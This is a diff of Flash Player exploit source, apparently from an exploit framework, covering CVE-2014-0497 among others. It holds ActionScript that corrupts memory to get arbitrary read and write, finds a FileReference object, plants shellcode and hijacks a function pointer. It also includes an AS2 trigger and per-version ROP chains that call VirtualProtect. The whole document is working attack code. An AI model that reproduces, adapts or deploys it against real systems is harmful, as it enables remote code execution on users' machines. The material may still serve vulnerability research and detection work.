+					tweaked_vector[72] = 41414141
+					tweaked_vector[73] = 41414141
+					tweaked_vector[74] = 41414141
+					tweaked_vector[75] = 41414141
+					tweaked_vector[76] = 41414141
+					tweaked_vector[77] = 41414141
+					tweaked_vector[78] = 41414141
+					tweaked_vector[79] = 41414141
+					tweaked_vector[7a] = 41414141
+					tweaked_vector[7b] = 41414141
+					tweaked_vector[7c] = 41414141
+					tweaked_vector[7d] = 41414141
+					tweaked_vector[7e] = 41414141
+					tweaked_vector[7f] = 41414141
+					tweaked_vector[80] = 41414141
+					tweaked_vector[81] = 41414141
+					tweaked_vector[82] = 41414141
+					tweaked_vector[83] = 41414141
+					tweaked_vector[84] = 41414141
+					tweaked_vector[85] = 41414141
+					tweaked_vector[86] = 41414141
+					tweaked_vector[87] = 41414141
+					tweaked_vector[88] = 41414141
+					tweaked_vector[89] = 41414141
+					tweaked_vector[8a] = 41414141
+					tweaked_vector[8b] = 41414141
+					tweaked_vector[8c] = 41414141
+					tweaked_vector[8d] = 41414141
+					tweaked_vector[8e] = 41414141
+					tweaked_vector[8f] = 41414141
+					tweaked_vector[90] = 0
+					tweaked_vector[91] = 0
+					tweaked_vector[92] = 0
+					tweaked_vector[93] = 0
+					tweaked_vector[94] = 0
+					tweaked_vector[95] = 0
+					tweaked_vector[96] = 0
+					tweaked_vector[97] = 0
+					tweaked_vector[98] = 0
+					tweaked_vector[99] = 0
+					tweaked_vector[9a] = 0
+					tweaked_vector[9b] = 0
+					tweaked_vector[9c] = 0
+					tweaked_vector[9d] = 0
+					tweaked_vector[9e] = 0
+					tweaked_vector[9f] = 0
+					tweaked_vector[a0] = 0
+					tweaked_vector[a1] = 0
+					tweaked_vector[a2] = 0
+					tweaked_vector[a3] = 0
+					tweaked_vector[a4] = 0
+					tweaked_vector[a5] = 0
+					*/					
+					while(j < param1.length)
+					{						
+						this.tweaked_vector[j - (back_offset + 2) + offset_length] = param1[j];
+						j++;
+					}
+					// next -> next to the tweaked vector
+					// tweaked_vector[a6] = 36					
+					// tweaked_vector[a7] = 1dea000
+					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + offset_length] = param1[back_offset]; // [166] => 36
+					this.tweaked_vector[2 * (this.len_massage_vector + 2) + this.len_massage_vector + 1 + offset_length] = param1[back_offset + 1]; //[167] => 1dea000
+				}
+				else // From the Timeout trigger; never reached on my tests.
+				{
+					_loc15_ = this.tweaked_vector[4 * (this.len_massage_vector + 2)-1];
+					this.tweaked_vector[0x3fffffff] = _loc15_;
+					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 2] = _loc15_;
+					this.tweaked_vector[0x3fffffff - this.len_massage_vector - 3] = this.len_massage_vector;
+					this.tweaked_vector[this.len_massage_vector + 1] = _loc15_;
+					this.tweaked_vector[2 * (this.len_massage_vector + 2)-1] = _loc15_;
+					this.tweaked_vector[3 * (this.len_massage_vector + 2)-1] = _loc15_;
+					this.tweaked_vector[this.len_massage_vector] = this.len_massage_vector;
+					this.tweaked_vector[2 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
+					this.tweaked_vector[3 * (this.len_massage_vector + 2) - 2] = this.len_massage_vector;
+				}
+				
+				this.massage_array[corrupted_index].length = 256; // :?
+				
+				// Search backwards to find the massage array metadata
+				// It's used to disclose the tweaked vector address
+				i = 0;
+				var hint = 0;
+				while(true)
+				{
+					hint = this.tweaked_vector[0x40000000 - i];
+					if(hint == this.maxElementsPerPage-1) //  0xe00012 - 1
+					{
+						break;
+					}
+					i++;
+				}
+				
+				this.tweaked_vector_address = 0; 
+				if(this.tweaked_vector[0x40000000 - i - 4] == 0)
+				{
+					throw new Error("error");
+				}
+				else
+				{
+					this.tweaked_vector_address = this.tweaked_vector[0x40000000 - i - 4] + (4 * this.len_massage_vector + 8) + 8 + 4 * offset_length;
+					
+					// I have not been able to understand this tweak,
+					// Maybe not necessary at all...
+					i = 0;
+					hint = 0;
+					while(true)
+					{
+						hint = this.tweaked_vector[0x40000000 - i];
+						if(hint == 0x7e3f0004)
+						{
+							break;
+						}
+						i++;
+					}
+					
+					this.tweaked_vector[0x40000000 - i + 1] = 4.294967295E9; // -1 / 0xffffffff					
+					// End of maybe not necessary tweak
+					
+					var file_ref_array = new Array();
+					i = 0;
+					while(i < 64)
+					{
+						file_ref_array[i] = new FileReference();
+						i++;
+					}
+					
+					var file_reference_address = this.getFileReferenceLocation(this.tweaked_vector, this.tweaked_vector_address);
+					var ptr_backup = this.getMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32);
+					
+					// Get array related data, important to trigger the desired corruption to achieve command execution
+					ninbets = this.getNinbets(this.tweaked_vector,this.tweaked_vector_address); 
+					array_with_code = this.createCodeVectors(0x45454545, 0x90909090); 
+					address_code = this.getCodeAddress(this.tweaked_vector, this.tweaked_vector_address, 0x45454545);
+					this.fillCodeVectors(array_with_code, address_code);
+					this.tweaked_vector[7] = ninbets[0] + 0;
+					this.tweaked_vector[4] = ninbets[1];
+					this.tweaked_vector[0] = 4096;
+					this.tweaked_vector[1] = address_code & 0xfffff000;
+					// Corruption
+					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, this.tweaked_vector_address + 8);
+					// Get arbitrary execution
+					i = 0;
+					while(i < 64)
+					{
+						file_ref_array[i].cancel();
+						i++;
+					}
+					this.tweaked_vector[7] = address_code;
+					i = 0;
+					while(i < 64)
+					{
+						file_ref_array[i].cancel();
+						i++;
+					}
+					// Restore Function Pointer
+					this.writeMemoryAt(this.tweaked_vector, this.tweaked_vector_address, file_reference_address + 32, ptr_backup);
+						
+					return;
+				}
+			}
+		}
+		
+		// vector: tweaked vector with 0x40000001 length
+		// vector_address: address of tweaked vector
+		// address: address to read
+		function getMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint) : uint {
+			if(address >= vector_address)
+			{
+				return vector[(address - vector_address) / 4];
+			}
+			return vector[0x40000000 - (vector_address - address) / 4];
+		}
+		
+		// vector: tweaked vector with 0x40000001 length
+		// vector_address: address of tweaked vector
+		// address: address to write
+		// value: value to write
+		function writeMemoryAt(vector:Vector.<int>, vector_address:uint, address:uint, value:uint) : * {
+			if(address >= vector_address)
+			{
+				vector[(address - vector_address) / 4] = value;
+			}
+			else
+			{
+				vector[0x40000000 - (vector_address - address) / 4] = value;
+			}
+		}
+		
+		function getNinbets(vector:*, vector_address:*) : Array {
+			var _loc9_:uint = 0;
+			var array_related_addr:uint = this.getMemoryAt(vector,vector_address,(vector_address & 0xfffff000) + 0x1c);
+			var index_array_related_addr:uint = 0;
+			var _loc5_:uint = 0;
+			var _loc6_:uint = 0;
+			if(array_related_addr >= vector_address)
+			{
+				index_array_related_addr = (array_related_addr - vector_address) / 4;
+			}
+			else
+			{
+				index_array_related_addr = 0x40000000 - (vector_address - array_related_addr) / 4;
+			}
+			var _loc7_:uint = 0;
+			while(true)
+			{
+				index_array_related_addr--;
+				_loc9_ = vector[index_array_related_addr];
+				if(_loc9_ == 0xfff870ff)
+				{
+					_loc7_ = 2;
+					break;
+				}
+				if(_loc9_ == 0xf870ff01)
+				{
+					_loc7_ = 1;
+					break;
+				}
+				if(_loc9_ == 0x70ff016a) 
+				{
+					_loc9_ = vector[index_array_related_addr + 1];
+					if(_loc9_ == 0xfc70fff8)
+					{
+						_loc7_ = 0;
+						break;
+					}
+				}
+				else
+				{
+					if(_loc9_ == 0x70fff870)
+					{
+						_loc7_ = 3;
+						break;
+					}
+				}
+			}
+			
+			_loc5_ = vector_address + 4 * index_array_related_addr - _loc7_;
+			index_array_related_addr--;
+			var _loc8_:uint = vector[index_array_related_addr];
+			if(_loc8_ == 0x16a0424)
+			{
+				return [_loc5_,_loc6_];
+			}
+			if(_loc8_ == 0x6a042444)
+			{
+				return [_loc5_,_loc6_];
+			}
+			if(_loc8_ == 0x424448b)
+			{
+				return [_loc5_,_loc6_];
+			}
+			if(_loc8_ == 0xff016a04)
+			{
+				return [_loc5_,_loc6_];
+			}
+			
+			_loc6_ = _loc5_ - 6;
+			while(true)
+			{
+				index_array_related_addr--;
+				_loc9_ = vector[index_array_related_addr];
+				if(_loc9_ == 0x850ff50)
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0x5e0cc483)
+					{
+						_loc7_ = 0;
+						break;
+					}
+				}
+				_loc9_ = _loc9_ & 0xffffff00;
+				if(_loc9_ == 0x50ff5000)
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0xcc48308)
+					{
+						_loc7_ = 1;
+						break;
+					}
+				}
+				_loc9_ = _loc9_ & 0xffff0000;
+				if(_loc9_ == 0xff500000)
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0xc4830850)
+					{
+						if(uint(vector[index_array_related_addr + 2]) == 0xc35d5e0c)
+						{
+							_loc7_ = 2;
+							break;
+						}
+					}
+				}
+				_loc9_ = _loc9_ & 0xff000000;
+				if(_loc9_ == 0x50000000) 
+				{
+					if(uint(vector[index_array_related_addr + 1]) == 0x830850ff)
+					{
+						if(uint(vector[index_array_related_addr + 2]) == 0x5d5e0cc4)  
+						{
+							_loc7_ = 3;
+							break;
+						}
+					}
+				}
+			}
+			
+			_loc5_ = vector_address + 4 * index_array_related_addr + _loc7_;
+			return [_loc5_,_loc6_];
+		}
+		
+		// vector: tweaked vector with 0x40000001 length
+		// address: address of tweaked vector
+		function getFileReferenceLocation(vector:*, address:*) : uint {
+			var flash_address:uint = this.getMemoryAt(vector,address,(address & 0xfffff000) + 28);
+			var _loc4_:uint = 0;
+			while(true)
+			{
+				_loc4_ = this.getMemoryAt(vector,address,flash_address + 8);
+				if(_loc4_ == 0x2a0)
+				{
+					break;
+				}
+				if(_loc4_ < 0x2a0)
+				{
+					flash_address = flash_address + 36;
+				}
+				else
+				{
+					flash_address = flash_address - 36;
+				}
+			}
+			
+			var file_ref_related_addr:uint = this.getMemoryAt(vector,address,flash_address + 12);
+			while(this.getMemoryAt(vector,address, file_ref_related_addr + 384) != 0xffffffff)
+			{
+				if(this.getMemoryAt(vector,address, file_ref_related_addr + 380) == 0xffffffff)
+				{
+					break;
+				}
+				file_ref_related_addr = this.getMemoryAt(vector, address, file_ref_related_addr + 8);
+			}
+			return file_ref_related_addr;
+		}
+				
+		function getCodeAddress(vector:*, vector_addr:*, mark:*) : uint {
+			var vector_length_read:uint = 0;
+			var vector_code_info_addr:uint = this.getMemoryAt(vector, vector_addr,(vector_addr & 0xfffff000) + 0x1c);
+			while(true)
+			{
+				vector_length_read = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 8);
+				if(vector_length_read == 2032) // code vector length
+				{
+					break;
+				}
+				vector_code_info_addr = vector_code_info_addr + 0x24;
+			}
+			
+			var vector_code_contents_addr:uint = this.getMemoryAt(vector, vector_addr, vector_code_info_addr + 0xc);
+			while(this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 0x28) != mark)
+			{
+				vector_code_contents_addr = this.getMemoryAt(vector, vector_addr, vector_code_contents_addr + 8);
+			}
+			return vector_code_contents_addr + 0x2c; // Code address, starting at nops after the mark
+		}
+		
+		// Every vector in the array => 7f0 (header = 8; data => 0x7e8)
+		function createCodeVectors(mark:uint, nops:uint) : * {
+			var array:Array = new Array();
+			var i:* = 0;
+			while(i < 8)
+			{
+				array[i] = new Vector.<uint>(2032 / 4 - 8);
+				array[i][0] = mark;
+				array[i][1] = nops;
+				i++;
+			}
+			return array;
+		}
+		
+		function fillCodeVectors(param1:Array, param2:uint) : * {
+			var i:uint = 0;
+			var sh:uint=1;
+			
+			while(i < param1.length)
+			{				
+				for(var u:String in shellcodeObj)
+				{
+					param1[i][sh++] = Number(shellcodeObj[u]); 
+				}
+				i++;
+				sh = 1;
+			}
+		}
+
+	}
+}
+
+// Trigger's ActionScript
+
+/*
+
+// Action script...
+
+// [Action in Frame 1]
+var b = new flash.display.BitmapData(4, 7);
+var filt = new flash.filters.DisplacementMapFilter(b, new flash.geom.Point(1, 2), 1, 2, 3, 4);
+var b2 = new flash.display.BitmapData(256, 512);
+var filt2 = new flash.filters.DisplacementMapFilter(b2, new flash.geom.Point(1, 2), 1, 2, 3, 4);
+var colors = [16777215, 16711680, 16776960, 52479];
+var alphas = [0, 1, 1, 1];
+var ratios = [0, 63, 126, 255];
+var ggf = new flash.filters.GradientGlowFilter(0, 45, colors, alphas, ratios, 55, 55, 2.500000, 2, "outer", false);
+var cmf = new flash.filters.ColorMatrixFilter([]);
+MyString2.setCMF(cmf);
+MyString1.setGGF(ggf);
+flash.filters.ColorMatrixFilter.prototype.resetMe = _global.ASnative(2106, 302);
+zz = MyString1;
+flash.display.BitmapData = zz;
+arr = new Array();
+var i = 0;
+while (i < 8192)
+{
+	arr[i] = new Number(0);
+	++i;
+} // end while
+var i = 100;
+while (i < 8192)
+{
+	arr[i] = "qwerty";
+	i = i + 8;
+} // end while
+k = filt.mapBitmap;
+zz = MyString2;
+flash.display.BitmapData = zz;
+k = filt.mapBitmap;
+cmf_matrix = cmf.matrix;
+cmf_matrix[4] = 8192;
+cmf_matrix[15] = 12.080810;
+cmf.matrix = cmf_matrix;
+ggf_colors = ggf.colors;
+ggf_alphas = ggf.alphas;
+mem = new Array();
+var i = 0;
+while (i < ggf_alphas.length)
+{
+	ggf_alphas[i] = ggf_alphas[i] * 255;
+	++i;
+} // end while
+for (i = 0; i < ggf_colors.length; i++)
+{
+	mem[i] = ggf_colors[i] + ggf_alphas[i] * 16777216;
+} // end of for
+ggf.colors = colors;
+ggf.alphas = alphas;
+ggf.ratios = ratios;
+var lc = new LocalConnection();
+lc.send("toAS3", "as2loaded", mem); 
+zz = cmf;
+zz.resetMe("b", 1, 1, 1);
+
+
+class MyString1 extends String
+{
+	static var ggf;
+	function MyString(a,b)
+	{
+		super();
+	}
+	
+	static function setGGF(myggf)
+	{
+		ggf = myggf;
+	}
+	
+	static function getGGF()
+	{
+		return (MyString1.ggf);
+	}
+}
+
+class MyString2 extends String
+{
+	static var cmf;
+	function MyString2(a,b)
+	{
+		super();
+	}
+	
+	static function setCMF(mycmf)
+	{
+		cmf = mycmf;
+	}
+	
+	static function getCMF()
+	{
+		return (MyString2.cmf);
+	}
+}
+
+
+*/

external/source/exploits/CVE-2014-0497/Vickers.as

@@ -0,0 +1,797 @@
+//Compile with mxmlc Vickers.as -o Vickers.swf
+package 
+{
+	import flash.display.Sprite;
+	import flash.system.Capabilities;
+	import flash.utils.ByteArray;
+	import __AS3__.vec.Vector;
+	import flash.system.ApplicationDomain;
+	import avm2.intrinsics.memory.*;
+	
+	public class Vickers extends Sprite 
+	{
+		
+		public static var shellcode:String;
+		
+		public function Vickers()
+		{
+			var params = root.loaderInfo.parameters;
+			shellcode = params["id"];
+			while (true)
+			{
+				if (exploit()) break;
+			};
+		}
+		
+		public function makePayload(vftableAddr:*, scAddr:*):ByteArray
+		{
+			var payload = null;
+			switch (Capabilities.os.toLowerCase())
+			{
+				case "windows xp":
+				case "windows vista":
+				case "windows server 2003 r2":
+				case "windows server 2003":
+				case "windows 7":
+				case "windows 7 x64":
+				case "windows server 2008 r2":
+				case "windows server 2008":
+					payload = makePayloadWinOther(vftableAddr, scAddr);
+					break;
+				case "windows 8":
+				case "windows 8 x64":
+					payload = makePayloadWin8(vftableAddr, scAddr);
+					break;
+				default:
+					return (null);
+			};
+			return (payload);
+		}
+		
+		public function makePayloadWin8(vftableAddr:*, scAddr:*):ByteArray
+		{
+			var flash_base:uint = vftableAddr;
+			var flash_end:uint;
+			var rop_payload:ByteArray = new ByteArray();
+			rop_payload.position = 0;
+			rop_payload.endian = "littleEndian";
+			rop_payload.writeUnsignedInt((scAddr + 4));
+			switch (Capabilities.version.toLowerCase())
+			{
+				case "win 11,3,372,94":
+					flash_base = (flash_base - 9518744);
+					flash_end = (flash_base + 0xB10000);
+					rop_payload.writeUnsignedInt((flash_base + 0x401404)); // add esp, 0x44; ret 
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 0x26525));  // xchg eax, esp; ret
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 0x10c5));   // pop eax; ret
+					rop_payload.writeUnsignedInt((flash_base + 0x817420)); // ptr to KERNEL32!VirtualProtectStub 
+					rop_payload.writeUnsignedInt((flash_base + 0x9e16));   // mov eax, dword ptr [eax]; ret
+					rop_payload.writeUnsignedInt((flash_base + 0xcc022));  // push eax; ret 
+					rop_payload.writeUnsignedInt((flash_base + 0x3157c));  // jmp esp ; ret after VirtualProtect
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(0x40);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,375,10":
+					flash_base = (flash_base - 9589392);
+					flash_end = (flash_base + 0xB15000);
+					rop_payload.writeUnsignedInt((flash_base + 4220004));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 142215));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8504352));
+					rop_payload.writeUnsignedInt((flash_base + 40214));
+					rop_payload.writeUnsignedInt((flash_base + 840082));
+					rop_payload.writeUnsignedInt((flash_base + 202134));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,376,12":
+					flash_base = (flash_base - 9593552);
+					flash_end = (flash_base + 0xB16000);
+					rop_payload.writeUnsignedInt((flash_base + 4220740));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 142023));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8508448));
+					rop_payload.writeUnsignedInt((flash_base + 39878));
+					rop_payload.writeUnsignedInt((flash_base + 839538));
+					rop_payload.writeUnsignedInt((flash_base + 201958));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,377,15":
+					flash_base = (flash_base - 9589576);
+					flash_end = (flash_base + 0xB15000);
+					rop_payload.writeUnsignedInt((flash_base + 4220388));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 141671));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8504352));
+					rop_payload.writeUnsignedInt((flash_base + 39526));
+					rop_payload.writeUnsignedInt((flash_base + 839698));
+					rop_payload.writeUnsignedInt((flash_base + 201590));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,378,5":
+					flash_base = (flash_base - 9589448);
+					flash_end = (flash_base + 0xB15000);
+					rop_payload.writeUnsignedInt((flash_base + 4220388));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 141671));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8504352));
+					rop_payload.writeUnsignedInt((flash_base + 39526));
+					rop_payload.writeUnsignedInt((flash_base + 839698));
+					rop_payload.writeUnsignedInt((flash_base + 201590));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,379,14":
+					flash_base = (flash_base - 9597856);
+					flash_end = (flash_base + 0xB17000);
+					rop_payload.writeUnsignedInt((flash_base + 4575113));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 6617808));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 8149060));
+					rop_payload.writeUnsignedInt((flash_base + 8512544));
+					rop_payload.writeUnsignedInt((flash_base + 4907562));
+					rop_payload.writeUnsignedInt((flash_base + 8147977));
+					rop_payload.writeUnsignedInt((flash_base + 4046601));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,167":
+					flash_base = (flash_base - 9821704);
+					flash_end = (flash_base + 0xB85000);
+					rop_payload.writeUnsignedInt((flash_base + 8405950));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 27456));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8791088));
+					rop_payload.writeUnsignedInt((flash_base + 73494));
+					rop_payload.writeUnsignedInt((flash_base + 1115794));
+					rop_payload.writeUnsignedInt((flash_base + 242790));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,171":
+					flash_base = (flash_base - 9821904);
+					flash_end = (flash_base + 0xB85000);
+					rop_payload.writeUnsignedInt((flash_base + 8406414));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 27456));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8791088));
+					rop_payload.writeUnsignedInt((flash_base + 73078));
+					rop_payload.writeUnsignedInt((flash_base + 1116754));
+					rop_payload.writeUnsignedInt((flash_base + 242380));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,180":
+					flash_base = (flash_base - 9816600);
+					flash_end = (flash_base + 0xB84000);
+					rop_payload.writeUnsignedInt((flash_base + 8404478));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 29514));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 8786992));
+					rop_payload.writeUnsignedInt((flash_base + 69382));
+					rop_payload.writeUnsignedInt((flash_base + 175197));
+					rop_payload.writeUnsignedInt((flash_base + 238732));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,169":
+					flash_base = (flash_base - 10441412);
+					flash_end = (flash_base + 0xC45000);
+					rop_payload.writeUnsignedInt((flash_base + 4640769));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 53338));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 9368732));
+					rop_payload.writeUnsignedInt((flash_base + 95414));
+					rop_payload.writeUnsignedInt((flash_base + 1145506));
+					rop_payload.writeUnsignedInt((flash_base + 2156132));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,202":
+					flash_base = (flash_base - 0x9f5470);
+					flash_end = (flash_base + 0xC45000);
+					rop_payload.writeUnsignedInt((flash_base + 0x46c361));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 0xcc5a));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 0x10c5));
+					rop_payload.writeUnsignedInt((flash_base + 0x8ef49c));
+					rop_payload.writeUnsignedInt((flash_base + 0x17136));
+					rop_payload.writeUnsignedInt((flash_base + 0x42f0));
+					rop_payload.writeUnsignedInt((flash_base + 0x40664));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,224":
+					flash_base = (flash_base - 10450228);
+					flash_end = (flash_base + 0xC7A000);
+					rop_payload.writeUnsignedInt((flash_base + 4646881));
+					rop_payload.position = 64;
+					rop_payload.writeUnsignedInt((flash_base + 52090));
+					rop_payload.position = 76;
+					rop_payload.writeUnsignedInt((flash_base + 4293));
+					rop_payload.writeUnsignedInt((flash_base + 9376924));
+					rop_payload.writeUnsignedInt((flash_base + 93510));
+					rop_payload.writeUnsignedInt((flash_base + 1145378));
+					rop_payload.writeUnsignedInt((flash_base + 1909483));
+					rop_payload.writeUnsignedInt(scAddr);
+					rop_payload.writeUnsignedInt(0x1000);
+					rop_payload.writeUnsignedInt(64);
+					rop_payload.writeUnsignedInt((scAddr - 4));
+					break;
+				default:
+					return (null);
+			};
+			return (rop_payload);
+		}
+		
+		public function makePayloadWinOther(vftableAddr:*, scAddr:*):ByteArray
+		{
+			var vftableAddr_copy:uint = vftableAddr;
+			var _local_5:uint;
+			var payload:ByteArray = new ByteArray();
+			payload.position = 0;
+			payload.endian = "littleEndian";
+			payload.writeUnsignedInt((scAddr + 4));
+			switch (Capabilities.version.toLowerCase())
+			{
+				case "win 11,0,1,152":
+					vftableAddr_copy = (vftableAddr_copy - 7628676);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 1041567));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1937003));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 4585805));
+					payload.writeUnsignedInt((vftableAddr_copy + 6697912));
+					payload.writeUnsignedInt((vftableAddr_copy + 2201532));
+					payload.writeUnsignedInt((vftableAddr_copy + 3985044));
+					payload.writeUnsignedInt((vftableAddr_copy + 2764856));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,1,102,55":
+					vftableAddr_copy = (vftableAddr_copy - 7633040);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4793772));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1939267));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 2297101));
+					payload.writeUnsignedInt((vftableAddr_copy + 6702008));
+					payload.writeUnsignedInt((vftableAddr_copy + 3976335));
+					payload.writeUnsignedInt((vftableAddr_copy + 3516263));
+					payload.writeUnsignedInt((vftableAddr_copy + 2768033));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,1,102,62":
+					vftableAddr_copy = (vftableAddr_copy - 7628912);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4794156));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1939856));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 5126527));
+					payload.writeUnsignedInt((vftableAddr_copy + 6702008));
+					payload.writeUnsignedInt((vftableAddr_copy + 2920469));
+					payload.writeUnsignedInt((vftableAddr_copy + 4454837));
+					payload.writeUnsignedInt((vftableAddr_copy + 2768325));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,1,102,63":
+					vftableAddr_copy = (vftableAddr_copy - 7628904);
+					_local_5 = (vftableAddr_copy + 0x927000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4794076));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1939822));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 5126435));
+					payload.writeUnsignedInt((vftableAddr_copy + 6702008));
+					payload.writeUnsignedInt((vftableAddr_copy + 2353542));
+					payload.writeUnsignedInt((vftableAddr_copy + 3516455));
+					payload.writeUnsignedInt((vftableAddr_copy + 2768305));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,2,202,228":
+					vftableAddr_copy = (vftableAddr_copy - 7726032);
+					_local_5 = (vftableAddr_copy + 0x93F000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4947482));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2022234));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 6255948));
+					payload.writeUnsignedInt((vftableAddr_copy + 6824832));
+					payload.writeUnsignedInt((vftableAddr_copy + 5021261));
+					payload.writeUnsignedInt((vftableAddr_copy + 6176368));
+					payload.writeUnsignedInt((vftableAddr_copy + 2847152));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,2,202,233":
+					vftableAddr_copy = (vftableAddr_copy - 7729872);
+					_local_5 = (vftableAddr_copy + 0x93F000);
+					payload.position = 8;
